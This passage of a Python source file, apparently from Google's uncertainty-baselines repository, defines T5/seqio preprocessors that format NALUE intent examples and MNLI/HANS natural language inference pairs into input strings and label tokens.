  encoded into a single token by seqio.SentencePieceVocabulary().encode()),
  and then concatenate them together as the output string.

  Output data format:
  {
      'inputs': 'some sentence'.
      'targets': '<token_1> <token_2> <token_3>',
  }

  In this way, after tokenization, the target sequence that the model should
  predict will be a sequence of three tokens (vertical_name_token,
  domain_name_token, intent_name_token).

  Args:
    example: A NALUE example with fields ('sentence', 'vertical', 'domain',
      'intent').
    intent_to_token_map: A mapping that maps intent names in the ('vertical',
      'domain', 'intent') fields to special tokens.

  Returns:
    A processed example.
  """
  inputs = example[NALUE_INPUT_NAME]
  targets = tokenize_compositional_intents(example, intent_to_token_map)

  return {'inputs': inputs, 'targets': targets}


def process_nli_inputs(example: Mapping[str, T5Text],
                       data_type: str = 'mnli') -> tf.Tensor:
  """Processes the sentence-pair inputs from MNLI and HANS examples.

  This function converts the sentence-pair inputs from NLI examples from MNLI
  or HANS datasets into a unified format. Specifically,

  Input data format from MNLI:
  {
      'premise': 'some sentence 1.',
      'hypothesis': 'some sentence 2.',
  }

  Input data format from HANS (notice the extra blank before period):
  {
      'sentence1': 'some sentence 1 .',
      'sentence2': 'some sentence 2 .',
  }

  Output:
  'premise: some sentence 1. hypothesis: some sentence 2.'

  Args:
    example: An input example with fields ('premise', 'hypothesis') if
      `data_type = 'mnli'`) or ('sentence1', 'sentence2') if
      `data_type='hans'`.
    data_type: The source dataset, can only be 'mnli' or 'hans'.

  Returns:
    A string in the format 'premise: {1ST_SENTENCE}. hypothesis:
    {2ND_SENTENCE}.'

  Raises:
    ValueError: If data_type is not one of ('mnli', 'hans').
  """
  supported_data_type = ('mnli', 'hans')
  if data_type not in supported_data_type:
    raise ValueError(
        f'data_type must be one of {supported_data_type}. Got "{data_type}".')

  # Extracts sentence from example.
  if data_type == 'mnli':
    premise = example['premise']
    hypothesis = example['hypothesis']
  else:
    # Remove the space before period.
    process_hans_str = lambda s: tf.strings.regex_replace(s, ' .$', '.')
    premise = process_hans_str(example['sentence1'])
    hypothesis = process_hans_str(example['sentence2'])

  # Concatenate sentences following t5.data.preprocessors.glue().
  strs_to_join = ['premise:', premise, 'hypothesis:', hypothesis]
  return tf.strings.join(strs_to_join, separator=' ')


@seqio.map_over_dataset
def nli_preprocessors_classification(
    example: Mapping[str, tf.Tensor],
    intent_to_token_map: tf.lookup.StaticHashTable,
    data_type: str = 'mnli',
    mnli_label_names: Sequence[str] = ('entailment', 'neutral',
                                       'contradiction')
) -> Dict[str, tf.Tensor]:
  """Preprocess NLI examples from MNLI or HANS into classification format.

  Input data format (MNLI):
  {
      'premise': 'some sentence 1.'.
      'hypothesis': 'some sentence 2.'.
      "label": 1,
  }

  Input data format (HANS):
  {
      'sentence1': 'some sentence 1 .'.
      'sentence2': 'some sentence 2 .'.
      "gold_label": 'entailment',
  }

  Output data format:
  {
      'inputs': 'premise: {1ST_SENTENCE} hypothesis: {2ND_SENTENCE}',
      'targets': '<token_1>',
  }

  Args:
    example: An NLI example from MNLI or HANS.
    intent_to_token_map: A mapping that maps intent names ('entailment',
      'non-entailment', 'neutral', 'contradiction') into binary tokens.
      (i.e., 'entailment' into class 1, otherwise to class 0).
    data_type: The source dataset, can only be 'mnli' or 'hans'.
    mnli_label_names: an ordered list of MNLI label names corresponding to
      class index.

  Returns:
    A processed example.

  Raises:
    ValueError: If data_type is not one of ('mnli', 'hans').
  """
  sentence = process_nli_inputs(example, data_type=data_type)

  if data_type == 'mnli':
    # MNLI stores an integer class index; map it to its label name.
    label_name = tf.gather(mnli_label_names, example['label'])
  else:
    label_name = example['gold_label']
  label_token = intent_to_token_map[label_name]

  return {'inputs': sentence, 'targets': label_token}
google/uncertainty-baselines
baselines/t5/data/preprocessors.py
preprocessors.py
py
11,183
python
en
code
1,305
github-code
36